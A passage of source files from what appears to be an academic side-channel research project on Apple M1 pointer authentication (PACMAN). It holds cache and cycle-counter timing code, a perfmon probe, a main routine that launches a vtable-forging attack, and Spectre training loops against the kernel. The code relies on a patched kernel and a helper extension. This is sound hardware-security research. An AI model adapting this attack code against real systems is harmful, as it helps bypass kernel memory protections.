66 | * * `new_prot`: New bit vector of protections to add. 67 | * 68 | * # Return Value 69 | * Returns a kernel error return type (`kern_return_t`). If this is not `KERN_SUCCESS`, 70 | * then some sort of error occurred. The error can be viewed with `mach_error_string`. 71 | */ 72 | pub fn mach_vm_protect(target: MachPort, addr: *const u8, size: usize, set_max: u32, new_prot: u64) -> KernReturn; 73 | 74 | /** 75 | * Read virtual memory from a mach port. 76 | * 77 | * # Arguments 78 | * * `target`: The port to read from. 79 | * * `addr`: Virtual address in the port to read. 80 | * * `size`: How many bytes to read? 81 | * * `data`: (OUT) This will be updated to point to the new buffer. 82 | * * `dataCount`: (OUT) This will be updated with the number of bytes read. 83 | * 84 | * # Return Value 85 | * Returns a kernel error return type (`kern_return_t`). If this is not `KERN_SUCCESS`, 86 | * then some sort of error occurred. The error can be viewed with `mach_error_string`. 87 | */ 88 | pub fn mach_vm_read(target: MachPort, addr: usize, size: usize, data: *mut *const u8, dataCount: *mut u64) -> KernReturn; 89 | 90 | /** 91 | * Aquire the task port for a given process by PID. 92 | * If PID is 0, this gets us the kernel task port. 93 | * 94 | * # Arguments 95 | * * `port`: The port from which the new port should be aquired (usually just mach_task_self()). 96 | * * `pid`: Process ID to grab. 97 | * * `newTask`: Points to a mach port (aka u64) that will be updated with the new task port. 98 | */ 99 | pub fn task_for_pid(port: MachPort, pid: u64, newTask: *mut MachPort) -> KernReturn; 100 | 101 | /** 102 | * Return the mach error for a given kern_return_t as a C string. 103 | * 104 | * # Arguments 105 | * * `err`: The error code returned from a mach call. 106 | * 107 | * # Return Value 108 | * Returns a pointer to a C string containing the error string. 109 | */ 110 | pub fn mach_error_string(err: KernReturn) -> *const std::os::raw::c_char; 111 | } 112 | 113 | /** 114 | * Returns the current task port for this process. 115 | * 116 | * # Return Value 117 | * Returns the task port (for use with other mach methods). 118 | */ 119 | pub unsafe fn mach_task_self() -> MachPort { 120 | return core::ptr::read_volatile(&mach_task_self_); 121 | } 122 | -------------------------------------------------------------------------------- /src/timer_multithread.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * It's timer_msr except using the counter.rs multithreaded counter as a timer. 3 | */ 4 | 5 | use crate::*; 6 | use core::arch::asm; 7 | 8 | /// TODO: Remove these from here 9 | // These are here because pacmankit kindly subtracts the timer overhead when reporting MSR reads from the kernel. 10 | // These are strictly a timer_msr thing so they do not belong here. We don't track overheads in this timer module as the 11 | // multithread timer has lots of variance and isn't super precise. We keep these equal to the value in timer_msr.rs 12 | // so that when doing timing with the multithreaded timer in userspace, the kernel overhead is still taken care of. 13 | // This will be resolved when we refactor the code. 14 | pub const TIMER_OVERHEAD_PCORE : u64 = 56; 15 | pub const TIMER_OVERHEAD_ECORE : u64 = 52; 16 | 17 | /** 18 | * Returns the time to access a given address using the counter thread. 19 | */ 20 | pub unsafe fn time_access(addr: u64) -> u64 { 21 | let t1 : u64; 22 | let t2 : u64; 23 | asm!{ 24 | "dsb sy", 25 | "isb", 26 | "ldr {t1}, [{cnt_addr}]", 27 | "isb", 28 | "ldr {val_out}, [{addr}]", 29 | "isb", 30 | "ldr {t2}, [{cnt_addr}]", 31 | "isb", 32 | "dsb sy", 33 | val_out = out(reg) _, 34 | addr = in(reg) addr, 35 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 36 | t1 = out(reg) t1, 37 | t2 = out(reg) t2, 38 | } 39 | return t2 - t1; 40 | } 41 | 42 | /** 43 | * Returns the time to write to a given address using the thread counter. 44 | */ 45 | pub unsafe fn time_store(addr: u64) -> u64 { 46 | let t1 : u64; 47 | let t2 : u64; 48 | let val_in : u64 = 0x3131313131313131; 49 | asm!{ 50 | "dsb sy", 51 | "isb", 52 | "ldr {t1}, [{cnt_addr}]", 53 | "isb", 54 | "str {val_in}, [{addr}]", 55 | "isb", 56 | "ldr {t2}, [{cnt_addr}]", 57 | "isb", 58 | "dsb sy", 59 | val_in = in(reg) val_in, 60 | addr = in(reg) addr, 61 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 62 | t1 = out(reg) t1, 63 | t2 = out(reg) t2, 64 | } 65 | return t2 - t1; 66 | } 67 | 68 | /** 69 | * Returns the time to execute a given address using the thread counter. 70 | */ 71 | pub unsafe fn time_exec(addr: u64) -> u64 { 72 | let t1 : u64; 73 | let t2 : u64; 74 | asm!{ 75 | "dsb sy", 76 | "isb", 77 | "ldr {t1}, [{cnt_addr}]", 78 | "isb", 79 | "blr {addr}", 80 | "isb", 81 | "ldr {t2}, [{cnt_addr}]", 82 | "isb", 83 | "dsb sy", 84 | addr = in(reg) addr, 85 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 86 | t1 = out(reg) t1, 87 | t2 = out(reg) t2, 88 | } 89 | return t2 - t1; 90 | } 91 | 92 | /** 93 | * Returns the constant time offset associated with performing measurements. 94 | * This number can be measured for a platform and then treated as a constant. 95 | */ 96 | pub fn timer_overhead() -> u64 { 97 | let t1 : u64; 98 | let t2 : u64; 99 | let val_out : u64; 100 | unsafe { 101 | asm!{ 102 | "isb", 103 | "ldr {t1}, [{cnt_addr}]", 104 | "isb", 105 | "nop", // Do a NOP instead of a LDR here 106 | "isb", 107 | "ldr {t2}, [{cnt_addr}]", 108 | "isb", 109 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 110 | t1 = out(reg) t1, 111 | t2 = out(reg) t2, 112 | } 113 | } 114 | return t2 - t1; 115 | } 116 | 117 | /** 118 | * Reports the time for a cache miss. 119 | * 120 | * # Arguments 121 | * * `untouched_page`: A page that has been allocated but never written to/ read from 122 | * (and is therefore not present in the TLB). 123 | * 124 | * # Return Value 125 | * Returns the number of cycles on a cache miss as reported by `timer::time_access`. 126 | * 127 | * # Side Effects 128 | * Will load several addresses from the page. 129 | * 130 | * # References 131 | * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1. 132 | */ 133 | pub fn time_miss(untouched_page: &mut [u8]) -> u64 { 134 | unsafe { 135 | time_access(&untouched_page[0] as *const u8 as u64); 136 | return time_access(&untouched_page[cache::L2_LINESIZE * 3] as *const u8 as u64); 137 | } 138 | } 139 | 140 | /** 141 | * Reports the time for a cache hit. 142 | * 143 | * # Arguments 144 | * * `page`: A page that can be read from. 145 | * 146 | * # Return Value 147 | * Returns the number of cycles on a cache hit as reported by `timer::time_access`. 148 | * 149 | * # Side Effects 150 | * Will load several addresses from the page. 151 | * 152 | * # References 153 | * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1. 154 | */ 155 | pub fn time_hit(page: &mut [u8]) -> u64 { 156 | unsafe { 157 | time_access(&page[0] as *const u8 as u64); 158 | return time_access(&page[0] as *const u8 as u64); 159 | } 160 | } -------------------------------------------------------------------------------- /misc/perfmon.c: -------------------------------------------------------------------------------- 1 | // Interact with /dev/perfmon 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | // Extracted headers from Kernel.framework: 13 | #include "machine_perfmon.h" 14 | 15 | #include "pacman.h" 16 | 17 | // Modified From: tests/perfmon_unit_tests.c 18 | struct perfmon_event test_events[2] = { 19 | { 20 | .pe_name = "test", 21 | .pe_number = 1, 22 | .pe_counter = 2, 23 | }, { 24 | .pe_name = "second", 25 | .pe_number = 2, 26 | .pe_counter = 4, 27 | }, 28 | }; 29 | 30 | int main () { 31 | // You can try "/dev/perfmon_uncore" or "/dev/perfmon_core" 32 | int fd = open("/dev/perfmon_core", O_RDWR); 33 | if (fd <= 0) { 34 | fprintf(stderr, "Error: %s\n", strerror(errno)); 35 | exit(EXIT_FAILURE); 36 | } 37 | 38 | struct perfmon_layout layout; 39 | int rv = ioctl(fd, PERFMON_CTL_GET_LAYOUT, &layout); 40 | printf("Retval is %d\n", rv); 41 | if (rv != 0) { 42 | printf("error is %s\n", strerror(errno)); 43 | exit(EXIT_FAILURE); 44 | } 45 | 46 | printf("HW Regs: %d\n", layout.pl_reg_count); 47 | 48 | struct perfmon_spec specs; 49 | memset(&specs, '\x00', sizeof(specs)); 50 | rv = ioctl(fd, PERFMON_CTL_SPECIFY, &specs); 51 | printf("Retval is %d\n", rv); 52 | if (rv != 0) { 53 | printf("error is %s\n", strerror(errno)); 54 | exit(EXIT_FAILURE); 55 | } 56 | 57 | perfmon_name_t *names = calloc(layout.pl_reg_count, 58 | sizeof(names[0])); 59 | uint64_t *values = calloc( 60 | layout.pl_reg_count * layout.pl_unit_count, 61 | sizeof(values[0])); 62 | 63 | /* 64 | 65 | PMCR0 (0), PMCR1 (1), PMCR2 (2), PMCR3 (3), 66 | PMCR4 (4), PMESR0 (5), PMESR1 (6), PMSR (7), 67 | OPMAT0 (8), OPMAT1 (9), PMCR_BVRNG4 (10), PMCR_BVRNG5 (11), 68 | PM_MEMFLT_CTL23 (12), PM_MEMFLT_CTL45 (13), PMMMAP (14), PMC0 (15), 69 | PMC1 (16), PMC2 (17), PMC3 (18), PMC4 (19), 70 | PMC5 (20), PMC6 (21), PMC7 (22), PMC8 (23), 71 | PMC9 (24) 72 | */ 73 | 74 | rv = ioctl(fd, PERFMON_CTL_LIST_REGS, names); 75 | for (unsigned short j = 0; j < layout.pl_reg_count; j++) { 76 | if (j != 0) { 77 | printf(", "); 78 | } 79 | // if (j % 4 == 0) { 80 | // printf("\n%4s", ""); 81 | // } 82 | printf("%s", names[j], j); 83 | } 84 | printf("\n"); 85 | 86 | rv = ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 87 | for (unsigned short j = 0; j < layout.pl_unit_count; j++) { 88 | printf("%2d: ", j); 89 | for (unsigned short k = 0; k < layout.pl_reg_count; 90 | k++) { 91 | if (k != 0) { 92 | printf(", "); 93 | if (k % 4 == 0) { 94 | printf("\n%4s", ""); 95 | } 96 | } 97 | 98 | uint64_t value = values[j * layout.pl_reg_count + k]; 99 | printf("0x%llX", value); 100 | } 101 | printf("\n"); 102 | } 103 | 104 | // again! 105 | rv = ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 106 | for (unsigned short j = 0; j < layout.pl_unit_count; j++) { 107 | printf("%2d: ", j); 108 | for (unsigned short k = 0; k < layout.pl_reg_count; 109 | k++) { 110 | if (k != 0) { 111 | printf(", "); 112 | if (k % 4 == 0) { 113 | printf("\n%4s", ""); 114 | } 115 | } 116 | 117 | uint64_t value = values[j * layout.pl_reg_count + k]; 118 | printf("0x%llX", value); 119 | } 120 | printf("\n"); 121 | } 122 | 123 | // now just the cycle counter 124 | #define CYCLE_COUNTER_IDX ((15)) 125 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 126 | printf("0x%llX\n", values[15]); 127 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 128 | printf("0x%llX\n", values[15]); 129 | 130 | // Let's time something 131 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 132 | int t1 = values[15]; 133 | for (int i = 0; i < 100; i++) { 134 | int x = i + 1; 135 | } 136 | ioctl(fd, PERFMON_CTL_SAMPLE_REGS, values); 137 | int t2 = values[15]; 138 | printf("It took %d cycles to do that loop\n", t2 - t1); 139 | printf("t1: %lld\nt2: %lld\n", t1, t2); 140 | 141 | rv = ioctl(fd, PERFMON_CTL_ADD_EVENT, &test_events[0]); 142 | printf("PERFMON_CTL_ADD_EVENT Retval is %d\n", rv); 143 | if (rv != 0) { 144 | printf("error is %s\n", strerror(errno)); 145 | exit(EXIT_FAILURE); 146 | } 147 | 148 | printf("Specs: %d\n", specs.ps_attrs); 149 | 150 | // rv = ioctl(fd, PERFMON_CTL_CONFIGURE); 151 | // printf("Retval is %d\n", rv); 152 | // if (rv != 0) { 153 | // printf("error is %s\n", strerror(errno)); 154 | // exit(EXIT_FAILURE); 155 | // } 156 | 157 | uint64_t tval = SREG_READ(SREG_PMC0); 158 | printf("%lld\n", tval); 159 | 160 | uint64_t pmcr0_val = values[0]; 161 | printf("PMCR0 is 0x%llX\n", pmcr0_val); 162 | } -------------------------------------------------------------------------------- /src/timer_msr.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Utilities for reading various timers. 3 | * 4 | * Requires PACMAN patch to XNU for this to work. 5 | */ 6 | 7 | use crate::*; 8 | use core::arch::asm; 9 | 10 | /// The overhead of doing timer measurements with a NOP 11 | /// This can be measured for your system with timer::timer_overhead() 12 | /// Set this to 0 to ignore. This value will be different depending on if 13 | /// you are running on a P or E core. 14 | pub const TIMER_OVERHEAD_PCORE : u64 = 56; 15 | pub const TIMER_OVERHEAD_ECORE : u64 = 52; 16 | 17 | /** 18 | * Returns the time to access a given address using the high resolution timers 19 | * 20 | * `S3_2_c15_c0_0` == `SREG_PMC0` (Cycle Counter). 21 | * Assumes the Pacman kernel patches are applied such that the timers are usable from EL0. 22 | */ 23 | pub unsafe fn time_access(addr: u64) -> u64 { 24 | let t1 : u64; 25 | let t2 : u64; 26 | asm!{ 27 | "dsb sy", 28 | "isb", 29 | "mrs {t1}, S3_2_c15_c0_0", 30 | "isb", 31 | "ldr {val_out}, [{addr}]", 32 | "isb", 33 | "mrs {t2}, S3_2_c15_c0_0", 34 | "isb", 35 | "dsb sy", 36 | val_out = out(reg) _, 37 | addr = in(reg) addr, 38 | t1 = out(reg) t1, 39 | t2 = out(reg) t2, 40 | } 41 | // Doing no load at all with 2 ISB's in between results in 56 cycles. 42 | // Doing only 1 ISB in between results in 28 (sometimes 26) cycles. 43 | return t2 - t1 - TIMER_OVERHEAD_PCORE; 44 | } 45 | 46 | /** 47 | * Returns the time to write to a given address using the high resolution timers 48 | * 49 | * `S3_2_c15_c0_0` == `SREG_PMC0` (Cycle Counter). 50 | * Assumes the Pacman kernel patches are applied such that the timers are usable from EL0. 51 | */ 52 | pub unsafe fn time_store(addr: u64) -> u64 { 53 | let t1 : u64; 54 | let t2 : u64; 55 | let val_in : u64 = 0x3131313131313131; 56 | asm!{ 57 | "dsb sy", 58 | "isb", 59 | "mrs {t1}, S3_2_c15_c0_0", 60 | "isb", 61 | "str {val_in}, [{addr}]", 62 | "isb", 63 | "mrs {t2}, S3_2_c15_c0_0", 64 | "isb", 65 | "dsb sy", 66 | val_in = in(reg) val_in, 67 | addr = in(reg) addr, 68 | t1 = out(reg) t1, 69 | t2 = out(reg) t2, 70 | } 71 | // Doing no load at all with 2 ISB's in between results in 56 cycles. 72 | // Doing only 1 ISB in between results in 28 (sometimes 26) cycles. 73 | return t2 - t1 - TIMER_OVERHEAD_PCORE; 74 | } 75 | 76 | /** 77 | * Returns the time to execute a given address using the high resolution timers 78 | * 79 | * `S3_2_c15_c0_0` == `SREG_PMC0` (Cycle Counter). 80 | * Assumes the Pacman kernel patches are applied such that the timers are usable from EL0. 81 | */ 82 | pub unsafe fn time_exec(addr: u64) -> u64 { 83 | let t1 : u64; 84 | let t2 : u64; 85 | asm!{ 86 | "dsb sy", 87 | "isb", 88 | "mrs {t1}, S3_2_c15_c0_0", 89 | "isb", 90 | "blr {addr}", 91 | "isb", 92 | "mrs {t2}, S3_2_c15_c0_0", 93 | "isb", 94 | "dsb sy", 95 | addr = in(reg) addr, 96 | t1 = out(reg) t1, 97 | t2 = out(reg) t2, 98 | } 99 | // Doing no load at all with 2 ISB's in between results in 56 cycles. 100 | // Doing only 1 ISB in between results in 28 (sometimes 26) cycles. 101 | return t2 - t1 - TIMER_OVERHEAD_PCORE; 102 | } 103 | 104 | /** 105 | * Returns the constant time offset associated with performing measurements. 106 | * This number can be measured for a platform and then treated as a constant. 107 | */ 108 | pub fn timer_overhead() -> u64 { 109 | let t1 : u64; 110 | let t2 : u64; 111 | let val_out : u64; 112 | unsafe { 113 | asm!{ 114 | "isb", 115 | "mrs {t1}, S3_2_c15_c0_0", 116 | "isb", 117 | "nop", // Do a NOP instead of a LDR here 118 | "isb", 119 | "mrs {t2}, S3_2_c15_c0_0", 120 | "isb", 121 | t1 = out(reg) t1, 122 | t2 = out(reg) t2, 123 | } 124 | } 125 | return t2 - t1; 126 | } 127 | 128 | /** 129 | * Reports the time for a cache miss. 130 | * 131 | * # Arguments 132 | * * `untouched_page`: A page that has been allocated but never written to/ read from 133 | * (and is therefore not present in the TLB). 134 | * 135 | * # Return Value 136 | * Returns the number of cycles on a cache miss as reported by `timer::time_access`. 137 | * 138 | * # Side Effects 139 | * Will load several addresses from the page. 140 | * 141 | * # References 142 | * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1. 143 | */ 144 | pub fn time_miss(untouched_page: &mut [u8]) -> u64 { 145 | unsafe { 146 | time_access(&untouched_page[0] as *const u8 as u64); 147 | return time_access(&untouched_page[cache::L2_LINESIZE * 3] as *const u8 as u64); 148 | } 149 | } 150 | 151 | /** 152 | * Reports the time for a cache hit. 153 | * 154 | * # Arguments 155 | * * `page`: A page that can be read from. 156 | * 157 | * # Return Value 158 | * Returns the number of cycles on a cache hit as reported by `timer::time_access`. 159 | * 160 | * # Side Effects 161 | * Will load several addresses from the page. 162 | * 163 | * # References 164 | * See 'Branch Different' by Hetterich and Schwarz Section 3.2 Listing 1. 165 | */ 166 | pub fn time_hit(page: &mut [u8]) -> u64 { 167 | unsafe { 168 | time_access(&page[0] as *const u8 as u64); 169 | return time_access(&page[0] as *const u8 as u64); 170 | } 171 | } -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | #![allow(unused_imports)] 2 | #![allow(unused_variables)] 3 | #![allow(unused_unsafe)] 4 | #![allow(unused_parens)] 5 | #![allow(unused_mut)] 6 | #![allow(non_snake_case)] 7 | #![allow(unused_must_use)] 8 | 9 | pub mod libdarwin; 10 | pub mod qos; 11 | pub mod retpoline; 12 | pub mod tests; 13 | pub mod counter; 14 | pub mod evset; 15 | pub mod pacmankit; 16 | pub mod cache; 17 | pub mod msr; 18 | pub mod attacks; 19 | pub mod pac; 20 | 21 | // Switch this with timer_multithread.rs to use that instead 22 | #[path="timer_msr.rs"] 23 | pub mod timer; 24 | 25 | use libdarwin::*; 26 | use timer::*; 27 | use mach::*; 28 | use qos::*; 29 | use retpoline::*; 30 | use tests::*; 31 | use counter::*; 32 | use evset::*; 33 | use kernel_rw::*; 34 | use iokit::*; 35 | use std::thread; 36 | use core::ptr::{read_volatile, write_volatile}; 37 | use core::arch::asm; 38 | use std::ffi::{CString, CStr}; 39 | use pacmankit::*; 40 | use cache::*; 41 | use std::collections::LinkedList; 42 | use attacks::*; 43 | use attacks::pacman::*; 44 | use pac::*; 45 | 46 | use rand::thread_rng; 47 | use rand::prelude::SliceRandom; 48 | 49 | /// How many bytes of memory should we create? 50 | pub const MEM_REGION_SIZE : usize = 0x40000000000usize; 51 | 52 | pub unsafe fn init_memory(memory_region: &mut [u8]) { 53 | let mut iter = 0; 54 | for i in (0..memory_region.len()).step_by(evset::STRIDE) { 55 | if iter >= evset::EVSET_SIZE_MAX { break; } 56 | core::ptr::write_volatile(&mut memory_region[i], 0x41); 57 | core::ptr::read_volatile(&memory_region[i]); 58 | iter+=1; 59 | } 60 | } 61 | 62 | /// Flush the entire L2 cache 63 | pub unsafe fn flush_cache(memory_region: &mut [u8]) { 64 | for i in (0..cache::L2_SIZE).step_by(cache::L1D_LINESIZE) { 65 | core::ptr::write_volatile(&mut memory_region[i], 0x41); 66 | core::ptr::read_volatile(&memory_region[i]); 67 | } 68 | } 69 | 70 | /// Flush the L1 iCache 71 | /// The provided address `retpoline` should be a cache::L1I_SIZE region filled with `ret`s. 72 | pub unsafe fn flush_iCache(retpoline: u64) { 73 | let retpoline_unsigned = retpoline & (!PAC_BITMASK); 74 | for i in (0..cache::L2_SIZE).step_by(cache::L1I_LINESIZE) { 75 | timer::time_exec(retpoline_unsigned + i as u64); 76 | } 77 | } 78 | 79 | /** 80 | * Run the attacker payload. 81 | * 82 | * # Arguments 83 | * * `shared_mem`: A memory buffer (represented as a slice) that can be used for experiments. 84 | */ 85 | pub unsafe fn attack(shared_mem: &mut [u8]) { 86 | // Various evict+reload / prime+probe / spectre tests 87 | // attacks::evict_reload::inst_evict_reload(shared_mem); 88 | // attacks::evict_reload::data_evict_reload(shared_mem); 89 | // attacks::evict_reload::inst_evict_reload_kernel(shared_mem); 90 | // attacks::evict_reload::data_evict_reload_kernel(shared_mem); 91 | // attacks::prime_probe::inst_prime_probe(shared_mem); 92 | // attacks::spectre::inst_spectre_kernel(shared_mem); 93 | 94 | // PACMAN Inst/ Data 95 | // attacks::pacman::data_testing(shared_mem, true); 96 | // attacks::pacman::inst_testing(shared_mem, true); 97 | 98 | // Forge a vtable pointer and entry 99 | attacks::pacman::end_to_end(shared_mem); 100 | 101 | // Attack a real system call 102 | // attacks::pacman::pacman_real(shared_mem); 103 | } 104 | 105 | /** 106 | * Report diagnostic information about the platform. 107 | * 108 | * # Arguments 109 | * `shared_mem`: At least 1 page of memory that has never been read from/ written to. 110 | */ 111 | pub unsafe fn report_platform_info(shared_mem: &mut [u8]) { 112 | // It's cool to reuse the same page for measuring miss latency after doing a hit measurement, 113 | // just not the other way around. 114 | let timer_overhead = timer::timer_overhead(); 115 | let miss_latency = timer::time_miss(shared_mem); 116 | let hit_latency = timer::time_hit(shared_mem); 117 | 118 | println!("Hit took {} cycles", hit_latency); 119 | println!("Miss took {} cycles", miss_latency); 120 | println!("Timer overhead is {} cycles", timer_overhead); 121 | println!("We are on core {}", core_id()); 122 | } 123 | 124 | /** 125 | * Setup the execution environment and launch the attack/ traces. 126 | */ 127 | pub fn main() { 128 | unsafe { 129 | crandom::srand(mach_absolute_time() as u32); 130 | 131 | // Pin ourselves to the P core 132 | if !set_core(CoreKind::PCORE) { 133 | println!("Error setting CPU affinity!"); 134 | return; 135 | } 136 | 137 | // Setup memory region 138 | let mut loc : *mut u8 = 0 as *mut u8; 139 | let kret = mach_vm_allocate( 140 | mach_task_self(), 141 | &mut loc, 142 | MEM_REGION_SIZE, 143 | VM_FLAGS_ANYWHERE 144 | ); 145 | 146 | let err_str = CStr::from_ptr(mach_error_string(kret)); 147 | 148 | if KERN_SUCCESS != kret { 149 | println!("Error creating memory region! ({}). Error is {:?}", kret, err_str); 150 | return; 151 | } 152 | 153 | println!("Created mach memory region at 0x{:X}", loc as u64); 154 | let shared_mem = core::slice::from_raw_parts_mut( 155 | loc as *mut u8, 156 | MEM_REGION_SIZE 157 | ); 158 | 159 | println!("Shared memory is at 0x{:X}", &shared_mem[0] as *const u8 as usize); 160 | 161 | // Create counter thread and sync up with it 162 | thread::spawn(|| counter_thread()); 163 | while 0 == read_volatile(&CTR) {} 164 | 165 | // Report platform info before shared_mem is initialized 166 | report_platform_info(shared_mem); 167 | init_memory(shared_mem); 168 | 169 | // Launch attacker code 170 | attack(shared_mem); 171 | } 172 | } 173 | -------------------------------------------------------------------------------- /src/attacks/spectre.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Spectre testing. 3 | */ 4 | use crate::*; 5 | use core::arch::asm; 6 | 7 | /// Target for userspace spectre data testing 8 | pub unsafe fn data_spectre_target(load_maybe: *const u8, do_it: bool) { 9 | if do_it { 10 | core::ptr::read_volatile(load_maybe); 11 | asm!{ 12 | "ldr {tmp}, [{ptr}]", 13 | tmp = lateout(reg) _, 14 | ptr = in(reg) load_maybe as u64, 15 | } 16 | } 17 | } 18 | 19 | /// Userspace spectre data attack 20 | pub unsafe fn data_spectre(memory_region: &mut [u8]) { 21 | let test_ptr = &memory_region[0] as *const u8; 22 | let spectre_ptr = &memory_region[4096] as *const u8; 23 | let spectre_addr = spectre_ptr as u64; 24 | 25 | core::ptr::read_volatile(test_ptr); 26 | core::ptr::read_volatile(spectre_ptr); 27 | init_memory(memory_region); 28 | 29 | for i in 0..128 { 30 | data_spectre_target(test_ptr, true); 31 | } 32 | 33 | data_spectre_target(spectre_ptr, false); 34 | println!("Time to access is {} cycles", timer::time_access(spectre_addr)); 35 | } 36 | 37 | /// Kernel mode spectre testing 38 | pub const NUM_DATA_SPECTRE_KERNEL_TRIALS : usize = 512; 39 | pub unsafe fn data_spectre_kernel(memory_region: &mut [u8]) { 40 | let handle = PacmanKitConnection::init().unwrap(); 41 | let kernel_region = handle.kernel_mmap().unwrap(); 42 | 43 | let train_ptr = kernel_region; 44 | let spectre_ptr = kernel_region + 0x100C80; 45 | let unrelated_ptr = kernel_region + 0x201DA0; 46 | 47 | println!("Training on 0x{:X}", train_ptr); 48 | println!("Spectre on 0x{:X}", spectre_ptr); 49 | let limit_va = handle.leak_limit_location().unwrap(); 50 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 51 | println!("LIMIT is at 0x{:X} (PA 0x{:X})", limit_va, limit_pa); 52 | println!("LIMIT contains 0x{:X}", handle.kernel_read(limit_va).unwrap()); 53 | 54 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 55 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), 50).into_iter().cloned().collect(); 56 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 57 | limit_indexes.shuffle(&mut thread_rng()); 58 | 59 | let mut times = [0u64; NUM_DATA_SPECTRE_KERNEL_TRIALS]; 60 | 61 | for cur_iter_idx in 0..NUM_DATA_SPECTRE_KERNEL_TRIALS { 62 | // 0. Get everything setup to a good known initial condition 63 | handle.kernel_read(train_ptr).unwrap(); 64 | handle.kernel_read(spectre_ptr).unwrap(); 65 | handle.kernel_read(unrelated_ptr).unwrap(); 66 | init_memory(memory_region); 67 | 68 | // 1. Train branch predictor 69 | for i in 0..64 { 70 | handle.kernel_read_for_spectre(train_ptr, 0x00).unwrap(); 71 | } 72 | 73 | // 2. Evict LIMIT variable 74 | for i in 0..limit_indexes.len() { 75 | timer::time_access(limit_evset_chosen[limit_indexes[i]]); 76 | } 77 | // init_memory(memory_region); 78 | flush_cache(memory_region); 79 | 80 | // 3. Perform speculative access 81 | // handle.kernel_read_for_spectre(spectre_ptr, 0x50).unwrap(); 82 | 83 | // 4. Record results with kernel timing oracle 84 | let latency = handle.kernel_read_for_timing(spectre_ptr, true).unwrap(); 85 | times[cur_iter_idx] = latency; 86 | // let latency_limit = handle.kernel_read_for_timing(limit_va, true).unwrap(); 87 | // times[cur_iter_idx] = (latency, latency_limit); 88 | } 89 | 90 | // Make sure to do all printing *AFTER* the tests have completed! 91 | // println!("Reload latency is {} cycles", latency); 92 | print!("["); 93 | for idx in 0..NUM_DATA_SPECTRE_KERNEL_TRIALS { 94 | print!("{},", times[idx]); 95 | } 96 | println!("]"); 97 | } 98 | 99 | /// Kernel mode spectre testing 100 | pub const NUM_INST_SPECTRE_KERNEL_TRIALS : usize = 512; 101 | pub unsafe fn inst_spectre_kernel(memory_region: &mut [u8]) { 102 | let handle = PacmanKitConnection::init().unwrap(); 103 | let kernel_region = handle.kernel_mmap().unwrap(); 104 | 105 | // @TODO: make this another address in the retpoline region: 106 | let train_ptr = handle.leak_win().unwrap() | PAC_BITMASK; 107 | // let spectre_ptr = handle.leak_method().unwrap() | PAC_BITMASK; 108 | let spectre_ptr = handle.leak_retpoline().unwrap() | PAC_BITMASK; 109 | 110 | println!("Training on 0x{:X}", train_ptr); 111 | println!("Spectre on 0x{:X}", spectre_ptr); 112 | let limit_va = handle.leak_limit_location().unwrap(); 113 | let limit_pa = handle.kernel_virt_to_phys(limit_va).unwrap(); 114 | println!("LIMIT is at 0x{:X} (PA 0x{:X})", limit_va, limit_pa); 115 | println!("LIMIT contains 0x{:X}", handle.kernel_read(limit_va).unwrap()); 116 | 117 | let limit_evset = evset::data_pevset(limit_va, limit_pa, memory_region); 118 | let mut limit_evset_chosen : Vec = limit_evset.choose_multiple(&mut rand::thread_rng(), 50).into_iter().cloned().collect(); 119 | let mut limit_indexes : Vec = (0..limit_evset_chosen.len()).collect(); 120 | limit_indexes.shuffle(&mut thread_rng()); 121 | 122 | let mut times = [0u64; NUM_INST_SPECTRE_KERNEL_TRIALS]; 123 | 124 | // Use a giant retpoline to flush the L1 iCache 125 | let mut retpoline_l1i_as_ptr : *mut u8 = 0 as *mut u8; 126 | let kret = mach::mach_vm_allocate( 127 | mach::mach_task_self(), 128 | &mut retpoline_l1i_as_ptr, 129 | cache::L2_SIZE, 130 | VM_FLAGS_ANYWHERE 131 | ); 132 | 133 | let err_str = CStr::from_ptr(mach_error_string(kret)); 134 | if KERN_SUCCESS != kret { 135 | println!("Error creating L1 iCache retpoline memory region! ({}). Error is {:?}", kret, err_str); 136 | return; 137 | } 138 | 139 | let retpoline_l1i = (retpoline_l1i_as_ptr as u64) & (!PAC_BITMASK); 140 | 141 | retpoline::mk_retpoline_addr(retpoline_l1i as u64, cache::L2_SIZE); 142 | 143 | for cur_iter_idx in 0..NUM_INST_SPECTRE_KERNEL_TRIALS { 144 | // 0. Get everything setup to a good known initial condition 145 | handle.kernel_exec_for_timing(train_ptr, true).unwrap(); 146 | handle.kernel_exec_for_timing(spectre_ptr, true).unwrap(); 147 | init_memory(memory_region); 148 | flush_cache(memory_region); 149 | flush_iCache(retpoline_l1i); 150 | 151 | // 1. Train branch predictor 152 | for i in 0..64 { 153 | handle.kernel_exec_for_spectre(train_ptr, 0x00).unwrap(); 154 | } 155 | 156 | // 2. Evict LIMIT variable 157 | for i in 0..limit_indexes.len() { 158 | timer::time_access(limit_evset_chosen[limit_indexes[i]]); 159 | } 160 | // init_memory(memory_region); 161 | // flush_cache(memory_region); 162 | 163 | // 3. Perform speculative access 164 | // Commenting this out should result in DRAM latencies only: 165 | handle.kernel_exec_for_spectre(spectre_ptr, 0x50).unwrap(); 166 | 167 | // 4. Record results with kernel timing oracle 168 | let latency = handle.kernel_exec_for_timing(spectre_ptr, true).unwrap(); 169 | times[cur_iter_idx] = latency; 170 | // let latency_limit = handle.kernel_read_for_timing(limit_va, true).unwrap(); 171 | // 